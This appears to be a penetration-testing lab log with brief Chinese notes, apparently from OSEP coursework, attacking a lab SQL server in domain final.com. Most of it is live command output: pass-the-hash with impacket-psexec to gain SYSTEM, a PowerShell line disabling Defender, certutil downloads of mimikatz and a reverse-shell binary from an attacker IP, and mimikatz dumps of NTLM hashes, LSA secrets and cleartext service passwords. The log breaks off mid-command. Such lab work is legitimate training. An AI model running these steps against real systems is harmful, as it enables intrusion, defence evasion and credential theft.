proxychains4 impacket-mssqlclient <tommy:[email protected]> -port 1433 -windows-auth
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ **proxychains4 impacket-mssqlclient <tommy:[email protected]> -port 1433 -windows-auth**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL11\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL11\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> **enable_xp_cmdshell
[-] ERROR(SQL11\\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(SQL11\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(SQL11\\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(SQL11\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.**
SQL>
proxychains4 crackmapexec smb 172.16.243.188 -u tommy -p '89dsfsji43A’
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 crackmapexec smb 172.16.243.188 -u tommy -p '89dsfsji43A'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:135 <--socket error or timeout!
**SMB 172.16.243.188 445 SQL11 [*] Windows 10.0 Build 17763 (name:SQL11) (domain:final.com) (signing:False) (SMBv1:False)**
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
SMB 172.16.243.188 445 SQL11 [+] final.com\\tommy:89dsfsji43A
利用获取的172.16.243.187的Hash,利用impacket-psexec进行连接:
**proxychains4 impacket-psexec -hashes :8388d07604009d14cbb78f7d37b9e887 [email protected]**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[*] Requesting shares on 172.16.243.188.....
[*] Found writable share ADMIN$
[*] Uploading file BhsfFPme.exe
[*] Opening SVCManager on 172.16.243.188.....
[*] Creating service XHDh on 172.16.243.188.....
[*] Starting service XHDh.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.188:445 ... OK
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.188
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
C:\\Windows\\system32> hostname
sql11
C:\\Windows\\system32> more c:\\Users\\Administrator\\Desktop\\proof.txt
c5cd6b2f7d31f8f4b392c49190ac864b
C:\\Windows\\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Windows\\Tasks> certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Windows\\Tasks> certutil.exe -urlcache -f <http://192.168.49.243/revshell.exe> revshell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Windows\\Tasks> dir
Volume in drive C has no label.
Volume Serial Number is AE77-6F2A
Directory of c:\\Windows\\Tasks
08/04/2022 02:17 AM <DIR> .
08/04/2022 02:17 AM <DIR> ..
08/04/2022 02:10 AM 1,234,696 mimikatz.exe
08/04/2022 02:17 AM 5,632 revshell.exe
2 File(s) 1,240,328 bytes
2 Dir(s) 6,156,959,744 bytes free
**c:\\Windows\\Tasks> revshell.exe**
得到一个新的反弹shell,比impacket-psexec好用:
c:\\Windows\\Tasks>mimikatz.exe "sekurlsa::logonPasswords" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 958035 (00000000:000e9e53)
Session : Interactive from 0
User Name : Administrator
Domain : SQL11
Logon Server : SQL11
Logon Time : 3/16/2022 5:29:29 PM
SID : S-1-5-21-2852705690-387487691-3395496674-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SQL11
* NTLM : 8388d07604009d14cbb78f7d37b9e887
* SHA1 : 6526b2fc55fcaa745a30e10065d5c44b0bac0b33
tspkg :
wdigest :
* Username : Administrator
* Domain : SQL11
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SQL11
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 261067 (00000000:0003fbcb)
Session : Interactive from 1
User Name : tina
Domain : FINAL
Logon Server : DC01
Logon Time : 3/16/2022 5:15:27 PM
SID : S-1-5-21-1725955968-4040474791-670206374-1109
msv :
[00000003] Primary
* Username : tina
* Domain : FINAL
* NTLM : 1d4c153225b424290188504b9e0541eb
* SHA1 : 6ea7a37a1b5b943266cde1176d497e0044d69512
* DPAPI : ea0e1bc1ff1c38a63033aa9e134b4fe4
tspkg :
wdigest :
* Username : tina
* Domain : FINAL
* Password : (null)
kerberos :
* Username : tina
* Domain : FINAL.COM
* Password : df54ikosdfGFkoal
ssp :
credman :
Authentication Id : 0 ; 106255 (00000000:00019f0f)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 3/16/2022 5:15:03 PM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL11$
* Domain : final.com
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
Authentication Id : 0 ; 54206 (00000000:0000d3be)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/16/2022 5:14:58 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : 749a0f74545e7a228bd4614a44b027e1
* SHA1 : 27ea897e4aaee4f58bbf6cc1f4534ec0d6cea28a
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL11$
* Domain : final.com
* Password : 74 76 28 1d 32 31 ac 9f 76 a1 da fd 29 12 5f 4b d8 6f b1 f2 28 7a ff 05 df 96 1f 09 5f 07 36 ca 94 02 dc 0e 89 9a d9 15 9b c0 01 e3 f2 99 e7 d2 2f c4 60 c0 46 33 25 8b e6 cc 32 5d 73 eb 90 da b3 88 57 9d 1a 27 f7 62 f0 5e 32 63 45 f8 51 28 05 fd 54 52 43 2e 94 10 1e 70 bc 51 a0 ed f6 53 7c f6 54 df b3 76 3e 9d 69 1b 60 bf 39 95 04 24 b1 2d c9 8e 46 a6 59 85 b6 f8 cd 4d 3a 83 79 cd 97 01 23 c9 da e5 a8 7c 65 bf 11 cc fb d1 63 27 5c 22 87 53 e2 59 fe 17 94 79 52 00 8b cf ed 3a e6 68 f7 04 75 f3 93 59 ef 6a 87 c8 4a 6b 0e 33 47 ef 8e 86 d5 ba 95 95 55 22 42 ec 7a 8c 68 a6 02 d4 9a 01 a8 ee e1 b7 5e 53 ea fa a7 61 ad a3 5f 2b e4 c3 a6 af 3d 68 f7 b4 72 19 f5 15 7a b7 b0 f7 58 b7 e5 cc b2 1c b6 d8 2a 5d 57 12 ab 1c
ssp :
credman :
Authentication Id : 0 ; 54148 (00000000:0000d384)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/16/2022 5:14:58 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL11$
* Domain : final.com
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SQL11$
Domain : FINAL
Logon Server : (null)
Logon Time : 3/16/2022 5:14:57 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql11$
* Domain : FINAL.COM
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
Authentication Id : 0 ; 35166 (00000000:0000895e)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 3/16/2022 5:14:57 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL11$
* Domain : final.com
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
Authentication Id : 0 ; 35124 (00000000:00008934)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 3/16/2022 5:14:57 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL11$
* Domain : final.com
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
Authentication Id : 0 ; 1969021 (00000000:001e0b7d)
Session : Service from 0
User Name : sqlsvc11
Domain : FINAL
Logon Server : DC01
Logon Time : 8/3/2022 11:59:13 PM
SID : S-1-5-21-1725955968-4040474791-670206374-1114
msv :
[00000003] Primary
* Username : sqlsvc11
* Domain : FINAL
* NTLM : c0f6442ea39956aebf28219639ba9953
* SHA1 : f5acd579746e2d6ea8e2828ce43016eb6d1375f2
* DPAPI : df3eded7cf4b7fea4bcec93057b9ab96
tspkg :
wdigest :
* Username : sqlsvc11
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sqlsvc11
* Domain : FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1076615 (00000000:00106d87)
Session : Interactive from 0
User Name : Administrator
Domain : SQL11
Logon Server : SQL11
Logon Time : 8/3/2022 11:58:36 PM
SID : S-1-5-21-2852705690-387487691-3395496674-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SQL11
* NTLM : 8388d07604009d14cbb78f7d37b9e887
* SHA1 : 6526b2fc55fcaa745a30e10065d5c44b0bac0b33
tspkg :
wdigest :
* Username : Administrator
* Domain : SQL11
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SQL11
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 260775 (00000000:0003faa7)
Session : Interactive from 1
**User Name : tina
Domain : FINAL
Logon Server : DC01**
Logon Time : 3/16/2022 5:15:27 PM
**SID : S-1-5-21-1725955968-4040474791-670206374-1109**
msv :
[00000003] Primary
* Username : tina
* Domain : FINAL
* NTLM : **1d4c153225b424290188504b9e0541eb**
* SHA1 : 6ea7a37a1b5b943266cde1176d497e0044d69512
* DPAPI : ea0e1bc1ff1c38a63033aa9e134b4fe4
tspkg :
wdigest :
* Username : tina
* Domain : FINAL
* Password : (null)
kerberos :
* Username : tina
* Domain : FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 3/16/2022 5:14:59 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 33868 (00000000:0000844c)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 3/16/2022 5:14:56 PM
SID :
msv :
[00000003] Primary
* Username : SQL11$
* Domain : FINAL
* NTLM : d218ba4449ccace7ecfa7f21440f42c6
* SHA1 : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SQL11$
Domain : FINAL
Logon Server : (null)
Logon Time : 3/16/2022 5:14:56 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SQL11$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql11$
* Domain : FINAL.COM
* Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
ssp :
credman :
mimikatz(commandline) # exit
Bye!
c:\\Windows\\Tasks>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
500 {0;000003e7} 1 D 29153 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 3741924 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 3776912 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : SQL11
SysKey : 339b21aeb30e1cc69a4269eda74b7b29
Local name : SQL11 ( S-1-5-21-2852705690-387487691-3395496674 )
Domain name : FINAL ( S-1-5-21-1725955968-4040474791-670206374 )
Domain FQDN : final.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {13a2a494-c2df-1380-6626-a1b48495068b}
[00] {13a2a494-c2df-1380-6626-a1b48495068b} f9b2d8d0b9420958530db18bec0a0cd551f3a1f24029ef8c912e2d898d7ffada
Secret : $MACHINE.ACC
cur/hex : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96
NTLM:d218ba4449ccace7ecfa7f21440f42c6
SHA1:7cb17f9fe3620ca8594301a73a0076485f0e3a7b
old/hex : 74 76 28 1d 32 31 ac 9f 76 a1 da fd 29 12 5f 4b d8 6f b1 f2 28 7a ff 05 df 96 1f 09 5f 07 36 ca 94 02 dc 0e 89 9a d9 15 9b c0 01 e3 f2 99 e7 d2 2f c4 60 c0 46 33 25 8b e6 cc 32 5d 73 eb 90 da b3 88 57 9d 1a 27 f7 62 f0 5e 32 63 45 f8 51 28 05 fd 54 52 43 2e 94 10 1e 70 bc 51 a0 ed f6 53 7c f6 54 df b3 76 3e 9d 69 1b 60 bf 39 95 04 24 b1 2d c9 8e 46 a6 59 85 b6 f8 cd 4d 3a 83 79 cd 97 01 23 c9 da e5 a8 7c 65 bf 11 cc fb d1 63 27 5c 22 87 53 e2 59 fe 17 94 79 52 00 8b cf ed 3a e6 68 f7 04 75 f3 93 59 ef 6a 87 c8 4a 6b 0e 33 47 ef 8e 86 d5 ba 95 95 55 22 42 ec 7a 8c 68 a6 02 d4 9a 01 a8 ee e1 b7 5e 53 ea fa a7 61 ad a3 5f 2b e4 c3 a6 af 3d 68 f7 b4 72 19 f5 15 7a b7 b0 f7 58 b7 e5 cc b2 1c b6 d8 2a 5d 57 12 ab 1c
NTLM:749a0f74545e7a228bd4614a44b027e1
SHA1:27ea897e4aaee4f58bbf6cc1f4534ec0d6cea28a
Secret : DefaultPassword
cur/text: df54ikosdfGFkoal
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 25 b2 1f 06 9c ac 36 7f 08 cd 33 6e e2 de c0 6f a9 1a c1 21 7e fa 31 4c 98 7a 9d 43 db 88 61 4f bd da 2f 41 45 12 94 e0
full: 25b21f069cac367f08cd336ee2dec06fa91ac1217efa314c987a9d43db88614fbdda2f41451294e0
m/u : 25b21f069cac367f08cd336ee2dec06fa91ac121 / 7efa314c987a9d43db88614fbdda2f41451294e0
old/hex : 01 00 00 00 19 80 17 9b 5e d6 b8 e7 16 68 75 b4 a8 45 13 e2 05 53 be c2 b8 4c 00 84 98 8a 0d 98 97 60 f6 bf fd 08 c1 54 db 51 e4 9f
full: 1980179b5ed6b8e7166875b4a84513e20553bec2b84c0084988a0d989760f6bffd08c154db51e49f
m/u : 1980179b5ed6b8e7166875b4a84513e20553bec2 / b84c0084988a0d989760f6bffd08c154db51e49f
Secret : NL$KM
cur/hex : 6f 40 10 60 3f c0 56 74 0b 3b 54 5f 6e a3 6e 28 0d 3f 34 8a 63 cd 0e 8c 0a 66 89 e6 96 88 0e 21 a3 58 96 04 55 ec 92 ed ea 56 0c ee 9a 4a 5b bf ba 6a 8a 77 32 99 3e e0 4a 60 a0 7d 6d 16 a9 ce
old/hex : 6f 40 10 60 3f c0 56 74 0b 3b 54 5f 6e a3 6e 28 0d 3f 34 8a 63 cd 0e 8c 0a 66 89 e6 96 88 0e 21 a3 58 96 04 55 ec 92 ed ea 56 0c ee 9a 4a 5b bf ba 6a 8a 77 32 99 3e e0 4a 60 a0 7d 6d 16 a9 ce
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: fsdDFklsdf90sdfwd
old/text: fdfk435sDFSsda
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\\SQLTELEMETRY$SQLEXPRESS
mimikatz(commandline) # exit
Bye!
c:\\Windows\\Tasks>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
500 {0;000003e7} 1 D 29153 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 3777659 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,28p) Primary
